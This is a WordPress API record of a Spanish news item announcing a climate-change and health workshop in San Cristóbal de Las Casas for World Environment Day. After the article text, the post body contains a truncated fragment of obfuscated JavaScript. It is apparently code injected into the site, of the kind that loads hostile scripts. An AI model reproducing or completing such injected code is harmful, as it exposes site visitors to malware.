{"id":10261,"date":"2023-05-30T03:52:31","date_gmt":"2023-05-30T03:52:31","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=10261"},"modified":"2023-05-30T03:52:32","modified_gmt":"2023-05-30T03:52:32","slug":"impartiran-taller-sobre-cambio-climatico","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=10261","title":{"rendered":"Impartir\u00e1n taller sobre cambio clim\u00e1tico"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"797\" height=\"591\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-29-at-4.32.13-PM.jpeg\" alt=\"\" class=\"wp-image-10262\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-29-at-4.32.13-PM.jpeg 797w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-29-at-4.32.13-PM-300x222.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-29-at-4.32.13-PM-768x569.jpeg 768w\" sizes=\"auto, (max-width: 797px) 100vw, 797px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal<\/p>\n\n\n\n<p>29 de Mayo del 2023. San Crist\u00f3bal de Las Casas.- La Red Internacional de Promotores, Coordinaci\u00f3n Chiapas, llevar\u00e1 a cabo un taller sobre el cambio clim\u00e1tico y el impacto en la salud, para el pr\u00f3ximo 5 de junio en el marco del D\u00eda Internacional del Medio Ambiente, en el Centro Cultural \u201cCarlos Jurado, inform\u00f3 la titular de esta instancia Sara Rosales<\/p>\n\n\n\n<p>En entrevista, coment\u00f3 que el taller tendr\u00e1 como invitado especial a Daniel L\u00f3pez Castro que viene de la ciudad de Comit\u00e1n de Dom\u00ednguez, \u201cestamos haciendo estas iniciativas, m\u00e1s que nada promoviendo la agenda 2030, es una agenda internacional con objetivos que enmarcan la equidad de g\u00e9nero, saneamiento de agua, son 17 objetivos que tenemos que manejar todos, gobierno, instituciones, escuelas\u201d.<\/p>\n\n\n\n<p>\u201cEn este marco del D\u00eda Mundial del Medio Ambiente tenemos dos invitados especiales, Daniel L\u00f3pez que dar\u00e1 el taller a las 4 de la tarde, y los chicos y chicas de la escuela Secundaria T\u00e9cnica 2 turno vespertino, son 20, agradezco la flexibilidad del director que tuvo la apertura, dijo s\u00ed, se van hacer m\u00e1s colaboraciones\u201d.<\/p>\n\n\n\n<p>Detall\u00f3 que el taller va durar dos horas, en la primera se ver\u00e1 algo de teor\u00eda y en la segunda un poco de arte, ya que van a reciclar botellas de pl\u00e1stico haciendo figuras, flores, y echar andar la creatividad.<\/p>\n\n\n\n<p>\u201cVamos a tener una jornada de la salud mental para octubre, el 10, fecha de la prevenci\u00f3n del suicidio, salud y bienestar tambi\u00e9n es parte de la agenda, acabamos de ir a la Unicach a impartir una conferencia sobre los 17 objetivos de desarrollo sostenible, somos una red, su sede est\u00e1 en Argentina, se va creando con otros pa\u00edses, este es el cap\u00edtulo M\u00e9xico donde se tienen varias redes en Monterrey, Ciudad de M\u00e9xico, Chiapas, todos en conjunto para hacer esta agenda 2030, es una asociaci\u00f3n civil\u201d, finaliz\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal 29 de Mayo del 2023. San Crist\u00f3bal de Las Casas.- La Red Internacional de Promotores, Coordinaci\u00f3n Chiapas, llevar\u00e1 a cabo un taller sobre el cambio clim\u00e1tico y el impacto en la salud, para el pr\u00f3ximo 5 de junio en el marco del D\u00eda Internacional del Medio Ambiente, en el Centro Cultural \u201cCarlos Jurado, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":10262,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-10261","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10261","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=10261"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10261\/revisions"}],"predecessor-version":[{"id":10263,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10261\/revisions\/10263"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/10262"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=10261"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=10261"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=10261"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}